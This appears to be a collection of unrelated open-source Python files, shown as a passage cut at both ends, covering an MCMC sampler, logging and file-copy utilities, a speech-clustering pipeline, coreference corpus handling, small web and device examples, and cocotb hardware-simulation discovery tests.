{}\n".format(self._task_result.runtime) else: s += "\tStatus: Pending\n" return s
spotpy/algorithms/mcmc.py
cheginit/spotpy
182
12634635
# -*- coding: utf-8 -*- ''' Copyright (c) 2018 by <NAME> This file is part of Statistical Parameter Optimization Tool for Python(SPOTPY). :author: <NAME> ''' from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals from . import _algorithm import numpy as np import time class mcmc(_algorithm): """ This class holds the MarkovChainMonteCarlo (MCMC) algorithm, based on: <NAME>., <NAME>., <NAME>., <NAME>. and <NAME>. (1953) Equation of state calculations by fast computing machines, J. Chem. Phys. """ def __init__(self, *args, **kwargs): """ Input ---------- spot_setup: class model: function Should be callable with a parameter combination of the parameter-function and return an list of simulation results (as long as evaluation list) parameter: function When called, it should return a random parameter combination. Which can be e.g. uniform or Gaussian objectivefunction: function Should return the objectivefunction for a given list of a model simulation and observation. evaluation: function Should return the true values as return by the model. dbname: str * Name of the database where parameter, objectivefunction value and simulation results will be saved. dbformat: str * ram: fast suited for short sampling time. no file will be created and results are saved in an array. * csv: A csv file will be created, which you can import afterwards. parallel: str * seq: Sequentiel sampling (default): Normal iterations on one core of your cpu. * mpi: Message Passing Interface: Parallel computing on cluster pcs (recommended for unix os). save_sim: boolean * True: Simulation results will be saved * False: Simulation results will not be saved """ kwargs['optimization_direction'] = 'maximize' kwargs['algorithm_name'] = 'Markov Chain Monte Carlo (MCMC) sampler' super(mcmc, self).__init__(*args, **kwargs) def check_par_validity(self, par): if len(par) == len(self.min_bound) and len(par) == len(self.max_bound): for i in range(len(par)): if par[i] < self.min_bound[i]: par[i] = self.min_bound[i] if par[i] > self.max_bound[i]: par[i] = self.max_bound[i] else: print('ERROR: Bounds have not the same lenghts as Parameterarray') return par def check_par_validity_reflect(self, par): if len(par) == len(self.min_bound) and len(par) == len(self.max_bound): for i in range(len(par)): if par[i] < self.min_bound[i]: par[i] = self.min_bound[i] + (self.min_bound[i]- par[i]) elif par[i] > self.max_bound[i]: par[i] = self.max_bound[i] - (par[i] - self.max_bound[i]) # Postprocessing if reflecting jumped out of bounds for i in range(len(par)): if par[i] < self.min_bound[i]: par[i] = self.min_bound[i] if par[i] > self.max_bound[i]: par[i] = self.max_bound[i] else: print('ERROR: Bounds have not the same lenghts as Parameterarray') return par def get_new_proposal_vector(self,old_par): new_par = np.random.normal(loc=old_par, scale=self.stepsizes) #new_par = self.check_par_validity(new_par) new_par = self.check_par_validity_reflect(new_par) return new_par def update_mcmc_status(self,par,like,sim,cur_chain): self.bestpar[cur_chain]=par self.bestlike[cur_chain]=like self.bestsim[cur_chain]=sim def sample(self, repetitions,nChains=1): self.set_repetiton(repetitions) print('Starting the MCMC algotrithm with '+str(repetitions)+ ' repetitions...') # Prepare storing MCMC chain as array of arrays. self.nChains = int(nChains) #Ensure initialisation of chains and database self.burnIn = self.nChains # define stepsize of MCMC. self.stepsizes = self.parameter()['step'] # array of stepsizes # Metropolis-Hastings iterations. self.bestpar=np.array([[np.nan]*len(self.stepsizes)]*self.nChains) self.bestlike=[[-np.inf]]*self.nChains self.bestsim=[[np.nan]]*self.nChains self.accepted=np.zeros(self.nChains) self.nChainruns=[[0]]*self.nChains self.min_bound, self.max_bound = self.parameter( )['minbound'], self.parameter()['maxbound'] print('Initialize ', self.nChains, ' chain(s)...') self.iter=0 param_generator = ((curChain,self.parameter()['random']) for curChain in range(int(self.nChains))) for curChain,randompar,simulations in self.repeat(param_generator): # A function that calculates the fitness of the run and the manages the database like = self.postprocessing(self.iter, randompar, simulations, chains=curChain) self.update_mcmc_status(randompar, like, simulations, curChain) self.iter+=1 intervaltime = time.time() print('Beginn of Random Walk') # Walk through chains while self.iter <= repetitions - self.burnIn: param_generator = ((curChain,self.get_new_proposal_vector(self.bestpar[curChain])) for curChain in range(int(self.nChains))) for cChain,randompar,simulations in self.repeat(param_generator): # A function that calculates the fitness of the run and the manages the database like = self.postprocessing(self.iter, randompar, simulations, chains=cChain) logMetropHastRatio = np.abs(self.bestlike[cChain])/np.abs(like) u = np.random.uniform(low=0.3, high=1) if logMetropHastRatio>1.0 or logMetropHastRatio>u: self.update_mcmc_status(randompar,like,simulations,cChain) self.accepted[cChain] += 1 # monitor acceptance self.iter+=1 # Progress bar acttime = time.time() #Refresh MCMC progressbar every two second if acttime - intervaltime >= 2 and self.iter >=2: text = '%i of %i (best like=%g)' % ( self.iter + self.burnIn, repetitions, self.status.objectivefunction_max) text = "Acceptance rates [%] =" +str(np.around((self.accepted)/float(((self.iter-self.burnIn)/self.nChains)),decimals=4)*100).strip('array([])') print(text) intervaltime = time.time() self.final_call()
saas/aiops/api/aiops-server/common/log_filter.py
iuskye/SREWorks
407
12634651
<gh_stars>100-1000 #!/usr/bin/env python # encoding: utf-8 """ """ __author__ = 'sreworks' import logging from flask import request from common import trace_id_generator class TraceIdFilter(logging.Filter): def filter(self, record): try: trace_id = request.environ.get("HTTP_TRACE_ID", "None") if trace_id == "None": trace_id = trace_id_generator.generate_trace_id(request.environ.get("REMOTE_ADDR")) user = request.environ.get("HTTP_X_AUTH_USER", "None") except Exception: trace_id = "None" user = "None" finally: record.trace_id = trace_id record.user = user return True
syzygy/scripts/benchmark/chrome_utils.py
nzeh/syzygy
343
12634736
<reponame>nzeh/syzygy<gh_stars>100-1000 #!python # Copyright 2011 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Utility functions for use by scripts in this directory.""" import logging import os import os.path import re import shutil import subprocess _LOGGER = logging.getLogger(__name__) def Subprocess(cmd_line): _LOGGER.info('Running command line %s', cmd_line) return subprocess.call(cmd_line) def RmTree(directory): """Silently do a recursive delete on directory.""" # shutil.rmtree can't cope with read-only files. Subprocess(['cmd', '/c', 'rmdir', '/s', '/q', directory]) # These directories are relative to the root of the Chrome installation. _EXPECTED_DIRS = [ 'locales', 'servers', 'extensions' ] def _PruneDirs(dirs): """Removes all unwanted directories from |dirs|, in place.""" for unwanted in (d for d in dirs if d.lower() not in _EXPECTED_DIRS): dirs.remove(unwanted) _EXCLUDE_PATTERNS = [ # Exclude all PDBs except for chrome.exe.pdb and chrome.dll.pdb. re.compile('^(?!(chrome[_\.](exe|dll))\.).+\.pdb$', re.I), # Exclude all test and chrome frame programs. re.compile('^.*(test|validate|example|sample).*$', re.I), # Exclude all zip/archive files. re.compile('^.+\.(7z|zip)$', re.I), ] def _FilesToCopy(file_list): """Generates the filtered list of files to copy.""" for file_name in file_list: if not any(p.match(file_name) for p in _EXCLUDE_PATTERNS): yield file_name def CopyChromeFiles(src_dir, tgt_dir): """Copy all required chrome files from src_dir to tgt_dir.""" src_dir = os.path.abspath(src_dir) tgt_dir = os.path.abspath(tgt_dir) if os.path.isdir(tgt_dir): RmTree(tgt_dir) os.makedirs(tgt_dir) for root_dir, sub_dirs, file_list in os.walk(src_dir): # Prune the top-level directories that we don't want to copy or descend # into. os.walk refers to the pruned directory list if we change it in # place, so doesn't actually descend into them. if src_dir == root_dir: _PruneDirs(sub_dirs) # Create the sub-directories at the target destination. for dir_name in sub_dirs: src = os.path.join(root_dir, dir_name) rel_path = os.path.relpath(src, src_dir) tgt = os.path.join(tgt_dir, rel_path) _LOGGER.info('Creating directory "%s".', rel_path) os.mkdir(tgt) # Copy files over to the target destination. for file_name in _FilesToCopy(file_list): src = os.path.join(root_dir, file_name) rel_path = os.path.relpath(src, src_dir) tgt = os.path.join(tgt_dir, rel_path) _LOGGER.info('Copying file "%s".', rel_path) try: shutil.copy2(src, tgt) except IOError: # When run as part of the build, there may be build targets still in # flight that we don't depend on and can't copy (because they're opened # exclusively by the build process). Let's assume that all the files we # want will copy correctly, ignore the exception, and hope for the best # on the other side. _LOGGER.warn('Skipped file "%s".', rel_path)
pyannote/audio/pipeline/speech_turn_clustering.py
avramandrei/pyannote-audio
1,543
12634740
#!/usr/bin/env python # encoding: utf-8 # The MIT License (MIT) # Copyright (c) 2018-2020 CNRS # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # AUTHORS # <NAME> - http://herve.niderb.fr import numpy as np from typing import Optional from pyannote.core import Annotation from pyannote.core import Timeline from pyannote.core.utils.numpy import one_hot_decoding from pyannote.pipeline import Pipeline from pyannote.audio.features import Precomputed from pyannote.pipeline.blocks.clustering import HierarchicalAgglomerativeClustering from pyannote.pipeline.blocks.clustering import AffinityPropagationClustering from .utils import assert_string_labels from pyannote.audio.features.wrapper import Wrapper, Wrappable class SpeechTurnClustering(Pipeline): """Speech turn clustering Parameters ---------- embedding : Wrappable, optional Describes how raw speaker embeddings should be obtained. See pyannote.audio.features.wrapper.Wrapper documentation for details. Defaults to "@emb" that indicates that protocol files provide the scores in the "emb" key. metric : {'euclidean', 'cosine', 'angular'}, optional Metric used for comparing embeddings. Defaults to 'cosine'. method : {'pool', 'affinity_propagation'} Set method used for clustering. "pool" stands for agglomerative hierarchical clustering with embedding pooling. "affinity_propagation" is for clustering based on affinity propagation. Defaults to "pool". window_wise : `bool`, optional Set `window_wise` to True to apply clustering on embedding extracted using the built-in sliding window. Defaults to apply clustering at speech turn level (one average embedding per speech turn). """ def __init__( self, embedding: Wrappable = None, metric: Optional[str] = "cosine", method: Optional[str] = "pool", window_wise: Optional[bool] = False, ): super().__init__() if embedding is None: embedding = "@emb" self.embedding = embedding self._embedding = Wrapper(self.embedding) self.metric = metric self.method = method if self.method == "affinity_propagation": self.clustering = AffinityPropagationClustering(metric=self.metric) # sklearn documentation: Preferences for each point - points with # larger values of preferences are more likely to be chosen as # exemplars. The number of exemplars, ie of clusters, is influenced by # the input preferences value. If the preferences are not passed as # arguments, they will be set to the median of the input similarities. # NOTE one could set the preference value of each speech turn # according to their duration. longer speech turns are expected to # have more accurate embeddings, therefore should be prefered for # exemplars else: self.clustering = HierarchicalAgglomerativeClustering( method=self.method, metric=self.metric, use_threshold=True ) self.window_wise = window_wise def _window_level(self, current_file: dict, speech_regions: Timeline) -> Annotation: """Apply clustering at window level Parameters ---------- current_file : `dict` File as provided by a pyannote.database protocol. speech_regions : `Timeline` Speech regions. Returns ------- hypothesis : `pyannote.core.Annotation` Clustering result. """ # load embeddings embedding = self._embedding(current_file) window = embedding.sliding_window # extract and stack embeddings of speech regions X = np.vstack( [ embedding.crop(segment, mode="center", fixed=segment.duration) for segment in speech_regions ] ) # apply clustering y_pred = self.clustering(X) # reconstruct y = np.zeros(len(embedding), dtype=np.int8) # n = total number of "speech" embeddings # s_pred = current position in y_pred s_pred, n = 0, len(y_pred) for segment in speech_regions: # get indices of current speech segment ((s, e),) = window.crop( segment, mode="center", fixed=segment.duration, return_ranges=True ) # hack for the very last segment that might overflow by 1 e_pred = min(s_pred + e - s, n - 1) e = s + (e_pred - s_pred) # assign y_pred to the corresponding speech regions y[s:e] = y_pred[s_pred:e_pred] # increment current position in y_red s_pred += e - s # reconstruct hypothesis return one_hot_decoding(y, window) def _turn_level(self, current_file: dict, speech_turns: Annotation) -> Annotation: """Apply clustering at speech turn level Parameters ---------- current_file : `dict` File as provided by a pyannote.database protocol. speech_turns : `Annotation` Speech turns. Should only contain `str` labels. Returns ------- hypothesis : `pyannote.core.Annotation` Clustering result. """ assert_string_labels(speech_turns, "speech_turns") embedding = self._embedding(current_file) labels = speech_turns.labels() X, clustered_labels, skipped_labels = [], [], [] for l, label in enumerate(labels): timeline = speech_turns.label_timeline(label, copy=False) # be more and more permissive until we have # at least one embedding for current speech turn for mode in ["strict", "center", "loose"]: x = embedding.crop(timeline, mode=mode) if len(x) > 0: break # skip labels so small we don't have any embedding for it if len(x) < 1: skipped_labels.append(label) continue clustered_labels.append(label) X.append(np.mean(x, axis=0)) # apply clustering of label embeddings clusters = self.clustering(np.vstack(X)) # map each clustered label to its cluster (between 1 and N_CLUSTERS) mapping = {label: k for label, k in zip(clustered_labels, clusters)} # map each skipped label to its own cluster # (between -1 and -N_SKIPPED_LABELS) for l, label in enumerate(skipped_labels): mapping[label] = -(l + 1) # do the actual mapping return speech_turns.rename_labels(mapping=mapping) def __call__( self, current_file: dict, speech_turns: Optional[Annotation] = None ) -> Annotation: """Apply speech turn clustering Parameters ---------- current_file : `dict` File as provided by a pyannote.database protocol. speech_turns : `Annotation`, optional Speech turns. Should only contain `str` labels. Defaults to `current_file['speech_turns']`. Returns ------- speech_turns : `pyannote.core.Annotation` Clustered speech turns (or windows in case `window_wise` is True) """ if speech_turns is None: speech_turns = current_file["speech_turns"] if self.window_wise: return self._window_level( current_file, speech_turns.get_timeline().support() ) return self._turn_level(current_file, speech_turns)
examples/example_unicode.py
alexbzg/picoweb
428
12634770
<gh_stars>100-1000 # # This is a picoweb example showing rendering of template # with Unicode (UTF-8) characters. # import picoweb app = picoweb.WebApp(__name__) @app.route("/") def index(req, resp): yield from picoweb.start_response(resp) data = {"chars": "абвгд", "var1": "α", "var2": "β", "var3": "γ"} yield from app.render_template(resp, "unicode.tpl", (data,)) import ulogging as logging logging.basicConfig(level=logging.INFO) app.run(debug=True)
pywemo/ouimeaux_device/motion.py
sullivanmj/pywemo
102
12634771
<reponame>sullivanmj/pywemo<gh_stars>100-1000 """Representation of a WeMo Motion device.""" from . import Device class Motion(Device): """Representation of a WeMo Motion device."""
cort/core/corpora.py
leonardoboliveira/cort
141
12634777
""" Represent and manipulate text collections as a list of documents.""" from collections import defaultdict import multiprocessing from cort.analysis import data_structures from cort.core import documents from cort.core import spans __author__ = 'smartschat' def from_string(string): return documents.CoNLLDocument(string) class Corpus: """Represents a text collection (a corpus) as a list of documents. Such a text collection can also be read from data, and be supplemented with antecedent information. Attributes: description(str): A human-readable description of the corpus. documents (list(Document)): A list of CoNLL documents. """ def __init__(self, description, corpus_documents): """Construct a Corpus from a description and a list of documents. Args: description (str): A human-readable description of the corpus. documents (list(Document)): A list of documents. """ self.description = description self.documents = corpus_documents def __iter__(self): """Return an iterator over documents in the corpus. Returns: An iterator over CoNLLDocuments. """ return iter(self.documents) @staticmethod def from_file(description, coref_file): """Construct a new corpus from a description and a file. The file must contain documents in the format for the CoNLL shared tasks on coreference resolution, see http://conll.cemantix.org/2012/data.html. Args: description (str): A human-readable description of the corpus. coref_file (file): A text file of documents in the CoNLL format. Returns: Corpus: A corpus consisting of the documents described in coref_file """ if coref_file is None: return [] document_as_strings = [] current_document = "" for line in coref_file.readlines(): if line.startswith("#begin") and current_document != "": document_as_strings.append(current_document) current_document = "" current_document += line document_as_strings.append(current_document) return Corpus(description, sorted([from_string(doc) for doc in document_as_strings])) def write_to_file(self, file): """Write a string representation of the corpus to a file, Args: file (file): The file the corpus should be written to. """ for document in self.documents: file.write(document.get_string_representation()) def write_antecedent_decisions_to_file(self, file): """Write antecedent decisions in the corpus to a file. For the format, have a look at the documenation for read_antecedent_decisions in this class. Args: file (file): The file the antecedent decisions should be written to. """ for document in self.documents: document.write_antecedent_decisions_to_file(file) def read_antecedents(self, file): """Augment corpus with antecedent decisions read from a file. The attribute annotated_mentions is overwritten by mentions read in from the antecedents file. Input files should have one antecedent decision per line, where entries are separated by tabs. The format is doc_identifier (anaphor_start, anaphor_end) (ante_start, ante_end) where - doc_id is the identifier in the first line of an CoNLL document after #begin document, such as (bc/cctv/00/cctv_0000); part 000 - anaphor_start is the position in the document where the anaphor begins (counting from 0), - anaphor_end is the position where the anaphor ends (inclusive), - ante_start, ante_end analogously for the antecedent. Args: file (file): The file the antecedent decisions should be written to. """ doc_identifier_to_pairs = defaultdict(list) for line in file.readlines(): splitted = line.split("\t") doc_id = splitted[0] span_anaphor = splitted[1] span_antecedent = splitted[2] doc_identifier_to_pairs[doc_id].append( (spans.Span.parse(span_anaphor), spans.Span.parse( span_antecedent))) for doc in self.documents: pairs = sorted(doc_identifier_to_pairs[doc.identifier]) doc.get_annotated_mentions_from_antecedent_decisions(pairs) def read_coref_decisions(self, mention_entity_mapping, antecedent_mapping=None): """Augment corpus with coreference and antecedent decisions.. Set set_id attribute and antecedent information for system mentions. Args: mention_entity_mapping (dict(Mention, int)): A mapping of mentions to entity identifiers. antecedent_mapping (dict(Mention, Mention)): A mapping of mentions to their antecedent. Optional.. """ for doc in self.documents: for mention in doc.system_mentions: if mention in mention_entity_mapping: mention.attributes["set_id"] = \ mention_entity_mapping[mention] if antecedent_mapping and mention in antecedent_mapping: antecedent = antecedent_mapping[mention] mention.attributes['antecedent'] = antecedent mention.document.antecedent_decisions[mention.span] = \ antecedent.span def get_antecedent_decisions(self, which_mentions="annotated"): """ Get all antecedent decisions in this corpus. Args: which_mentions (str): Either "annotated" or "system". Defaults to "system". Signals whether to consider annotated mentions or system mentions. Returns: StructuredCoreferenceAnalysis: A StructuredCoreferenceAnalysis containing all antecedent decisions. Can be accessed like a dict. If this is assigned a a variable ``x``, the decisions can be accessed via ``x[self.description][ "decisions"]["all"]``, where ``self.description`` is the ``description`` attribute of the corpus (e.g. ``x["pair"][ "decisions"]["all"]).. """ antecedent_decisions = { self.description: { "decisions": { "all": {} } } } all_decisions = set() for doc in self.documents: doc_decisions = doc.get_antecedent_decisions(which_mentions) for ana, ante in doc_decisions.items(): all_decisions.add((ana, ante)) antecedent_decisions[self.description]["decisions"]["all"] = \ data_structures.EnhancedSet(all_decisions) return data_structures.StructuredCoreferenceAnalysis( antecedent_decisions, {self.description: self}, None) def are_coreferent(self, m, n): """ Compute whether two mentions are coreferent in this corpus. One use case of this function is when ``m`` and ``n`` belong to a different corpus object, but you are interested in whether they are coreferent according to the annotation present in this corpus. Args: m (Mention): A mention. n (Mention): Another mention. Returns: True if ``m`` and ``n`` are coreferent according to the annotation present in this corpus, False otherwise. """ if m.document != n.document: return False elif m.document not in self.documents: return False else: doc = self.documents[self.documents.index(m.document)] if m.span not in doc.spans_to_annotated_mentions or \ n.span not in doc.spans_to_annotated_mentions: return False m_in_this_corpus = doc.spans_to_annotated_mentions[m.span] n_in_this_corpus = doc.spans_to_annotated_mentions[n.span] return m_in_this_corpus.is_coreferent_with(n_in_this_corpus)
viewflow/parsers/parse_r.py
pietervans/viewflow
106
12634784
import pathlib import yaml import re from typing import Any, Dict def parse_r(file: pathlib.Path) -> Dict[str, Any]: content = file.read_text().split("\n") l = [i for i, x in enumerate(content) if re.search(r"# ---", x)] temp = "\n".join(content[l[0] + 1 : l[1]]) yml = re.sub(r"# ", "", temp) task_config = yaml.safe_load(yml) extras = { "type": "ROperator", "content": "\n".join(content[0 : l[0]] + content[(l[1] + 1) :]), "task_file_path": str(file) } task_config.update(extras) return task_config
opta/commands/init_templates/variables/name.py
riddopic/opta
595
12634801
<reponame>riddopic/opta<gh_stars>100-1000 import os from opta.commands.init_templates.helpers import dictionary_deep_set from opta.commands.init_templates.template import TemplateVariable from opta.layer import Layer def apply(d: dict, v: str) -> dict: set_path = dictionary_deep_set(["name"]) set_path(d, v) return d nameVariable = TemplateVariable( prompt="Name", applier=apply, validator=Layer.valid_name, error_message="Invalid name: can only contain letters, dashes and numbers", default_value=os.path.basename(os.getcwd()), )
tests/test_cases/test_discovery/test_discovery.py
lavanyajagan/cocotb
350
12634807
<reponame>lavanyajagan/cocotb # Copyright (c) 2013 Potential Ventures Ltd # Copyright (c) 2013 SolarFlare Communications Inc # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of Potential Ventures Ltd, # SolarFlare Communications Inc nor the # names of its contributors may be used to endorse or promote products # derived from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL POTENTIAL VENTURES LTD BE LIABLE FOR ANY # DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import pytest import cocotb from cocotb._sim_versions import IcarusVersion from cocotb.binary import BinaryValue from cocotb.handle import ConstantObject, HierarchyObject, IntegerObject, StringObject from cocotb.triggers import Timer # GHDL is unable to access signals in generate loops (gh-2594) @cocotb.test( expect_error=IndexError if cocotb.SIM_NAME.lower().startswith("ghdl") else () ) async def pseudo_region_access(dut): """Test that pseudo-regions are accessible before iteration""" # Ensure pseudo-region lookup will fail if len(dut._sub_handles) != 0: dut._sub_handles = {} dut.genblk1[0] @cocotb.test() async def recursive_discover(dut): """Discover absolutely everything in the DUT""" def _discover(obj): for thing in obj: dut._log.debug("Found %s (%s)", thing._name, type(thing)) _discover(thing) _discover(dut) @cocotb.test() async def discover_module_values(dut): """Discover everything in the DUT""" count = 0 for thing in dut: count += 1 assert count >= 2, "Expected to discover things in the DUT" @cocotb.test() async def discover_value_not_in_dut(dut): """Try and get a value from the DUT that is not there""" with pytest.raises(AttributeError): dut.fake_signal @cocotb.test() async def access_signal(dut): """Access a signal using the assignment mechanism""" dut.stream_in_data.setimmediatevalue(1) await Timer(1, "ns") assert dut.stream_in_data.value.integer == 1 @cocotb.test(skip=cocotb.LANGUAGE in ["vhdl"]) async def access_type_bit_verilog(dut): """Access type bit in SystemVerilog""" await Timer(1, "step") assert dut.mybit.value == 1, "The default value was incorrect" dut.mybit.value = 0 await Timer(1, "ns") assert dut.mybit.value == 0, "The assigned value was incorrect" assert dut.mybits.value == 0b11, "The default value was incorrect" dut.mybits.value = 0b00 await Timer(1, "ns") assert dut.mybits.value == 0b00, "The assigned value was incorrect" assert dut.mybits_uninitialized.value == 0b00, "The default value was incorrect" dut.mybits_uninitialized.value = 0b11 await Timer(1, "ns") assert dut.mybits_uninitialized.value == 0b11, "The assigned value was incorrect" @cocotb.test(skip=cocotb.LANGUAGE in ["vhdl"]) async def access_type_bit_verilog_metavalues(dut): """Access type bit in SystemVerilog with metavalues that the type does not support. Note that some simulators (wrongly) allow metavalues even for bits when taking the VPI route. The metavalues still may show up as `0` and `1` in HDL (Xcelium and Riviera). """ await Timer(1, "ns") dut.mybits.value = BinaryValue("XZ") await Timer(1, "ns") print(dut.mybits.value.binstr) if cocotb.SIM_NAME.lower().startswith(("icarus", "ncsim", "xmsim")): assert ( dut.mybits.value.binstr.lower() == "xz" ), "The assigned value was not as expected" elif cocotb.SIM_NAME.lower().startswith(("riviera",)): assert ( dut.mybits.value.binstr.lower() == "10" ), "The assigned value was not as expected" else: assert ( dut.mybits.value.binstr.lower() == "00" ), "The assigned value was incorrect" dut.mybits.value = BinaryValue("ZX") await Timer(1, "ns") print(dut.mybits.value.binstr) if cocotb.SIM_NAME.lower().startswith(("icarus", "ncsim", "xmsim")): assert ( dut.mybits.value.binstr.lower() == "zx" ), "The assigned value was not as expected" elif cocotb.SIM_NAME.lower().startswith(("riviera",)): assert ( dut.mybits.value.binstr.lower() == "01" ), "The assigned value was not as expected" else: assert ( dut.mybits.value.binstr.lower() == "00" ), "The assigned value was incorrect" @cocotb.test( # Icarus up to (and including) 10.3 doesn't support bit-selects, see https://github.com/steveicarus/iverilog/issues/323 expect_error=IndexError if ( cocotb.SIM_NAME.lower().startswith("icarus") and (IcarusVersion(cocotb.SIM_VERSION) <= IcarusVersion("10.3 (stable)")) ) else (), skip=cocotb.LANGUAGE in ["vhdl"], ) async def access_single_bit(dut): """Access a single bit in a vector of the DUT""" dut.stream_in_data.value = 0 await Timer(1, "ns") dut.stream_in_data[2].value = 1 await Timer(1, "ns") assert dut.stream_out_data_comb.value.integer == (1 << 2) @cocotb.test() async def access_single_bit_erroneous(dut): """Access a non-existent single bit""" with pytest.raises(IndexError): dut.stream_in_data[100000] # Riviera discovers integers as nets (gh-2597) # GHDL discovers integers as nets (gh-2596) # Icarus does not support integer signals (gh-2598) @cocotb.test( expect_error=AttributeError if cocotb.SIM_NAME.lower().startswith(("icarus", "chronologic simulation vcs")) else (), expect_fail=( cocotb.SIM_NAME.lower().startswith("riviera") and cocotb.LANGUAGE in ["verilog"] or cocotb.SIM_NAME.lower().startswith("ghdl") ), ) async def access_integer(dut): """Integer should show as an IntegerObject""" assert isinstance(dut.stream_in_int, IntegerObject) with pytest.raises(IndexError): dut.stream_in_int[3] assert len(dut.stream_in_int) == 1 @cocotb.test(skip=cocotb.LANGUAGE in ["verilog"]) async def access_ulogic(dut): """Access a std_ulogic as enum""" dut.stream_in_valid @cocotb.test(skip=cocotb.LANGUAGE in ["verilog"]) async def access_constant_integer(dut): """ Access a constant integer """ assert isinstance(dut.isample_module1.EXAMPLE_WIDTH, ConstantObject) assert dut.isample_module1.EXAMPLE_WIDTH == 7 # GHDL inexplicably crashes, so we will skip this test for now # likely has to do with overall poor support of string over the VPI @cocotb.test( skip=cocotb.LANGUAGE in ["verilog"] or cocotb.SIM_NAME.lower().startswith("ghdl") ) async def access_constant_string_vhdl(dut): """Access to a string, both constant and signal.""" constant_string = dut.isample_module1.EXAMPLE_STRING assert isinstance(constant_string, ConstantObject) assert constant_string.value == b"TESTING" # GHDL discovers strings as vpiNetArray (gh-2584) @cocotb.test( skip=cocotb.LANGUAGE in ["verilog"], expect_error=TypeError if cocotb.SIM_NAME.lower().startswith("ghdl") else (), ) async def test_writing_string_undersized(dut): test_string = b"cocotb" dut.stream_in_string.setimmediatevalue(test_string) assert dut.stream_out_string == b"" await Timer(1, "ns") assert dut.stream_out_string.value == test_string # GHDL discovers strings as vpiNetArray (gh-2584) @cocotb.test( skip=cocotb.LANGUAGE in ["verilog"], expect_error=TypeError if cocotb.SIM_NAME.lower().startswith("ghdl") else (), ) async def test_writing_string_oversized(dut): test_string = b"longer_than_the_array" dut.stream_in_string.setimmediatevalue(test_string) await Timer(1, "ns") assert dut.stream_out_string.value == test_string[: len(dut.stream_out_string)] # GHDL discovers strings as vpiNetArray (gh-2584) @cocotb.test( skip=cocotb.LANGUAGE in ["verilog"], expect_error=TypeError if cocotb.SIM_NAME.lower().startswith("ghdl") else (), ) async def test_read_single_character(dut): test_string = b"cocotb!!!" idx = 3 dut.stream_in_string.setimmediatevalue(test_string) await Timer(1, "ns") # String is defined as string(1 to 8) so idx=3 will access the 3rd character assert dut.stream_out_string[idx].value == test_string[idx - 1] # GHDL discovers strings as vpiNetArray (gh-2584) @cocotb.test( skip=cocotb.LANGUAGE in ["verilog"], expect_error=TypeError if cocotb.SIM_NAME.lower().startswith("ghdl") else (), ) async def test_write_single_character(dut): # set initial value test_string = b"verilog0" dut.stream_in_string.setimmediatevalue(test_string) await Timer(1, "ns") # iterate over each character handle and uppercase it for c in dut.stream_in_string: lowercase = chr(c) uppercase = lowercase.upper() uppercase_as_int = ord(uppercase) c.setimmediatevalue(uppercase_as_int) await Timer(1, "ns") # test the output is uppercased assert dut.stream_out_string.value == test_string.upper() # TODO: add tests for Verilog "string_input_port" and "STRING_LOCALPARAM" (see issue #802) @cocotb.test( skip=cocotb.LANGUAGE in ["vhdl"] or cocotb.SIM_NAME.lower().startswith("riviera"), expect_error=AttributeError if cocotb.SIM_NAME.lower().startswith("icarus") else (), ) async def access_const_string_verilog(dut): """Access to a const Verilog string.""" await Timer(10, "ns") assert isinstance(dut.STRING_CONST, StringObject) assert dut.STRING_CONST == b"TESTING_CONST" dut.STRING_CONST.value = b"MODIFIED" await Timer(10, "ns") assert dut.STRING_CONST != b"TESTING_CONST" @cocotb.test( skip=cocotb.LANGUAGE in ["vhdl"], expect_error=AttributeError if cocotb.SIM_NAME.lower().startswith("icarus") else (), ) async def access_var_string_verilog(dut): """Access to a var Verilog string.""" await Timer(10, "ns") assert isinstance(dut.STRING_VAR, StringObject) assert dut.STRING_VAR == b"TESTING_VAR" dut.STRING_VAR.value = b"MODIFIED" await Timer(10, "ns") assert dut.STRING_VAR == b"MODIFIED" @cocotb.test(skip=cocotb.LANGUAGE in ["verilog"]) async def access_constant_boolean(dut): """Test access to a constant boolean""" assert 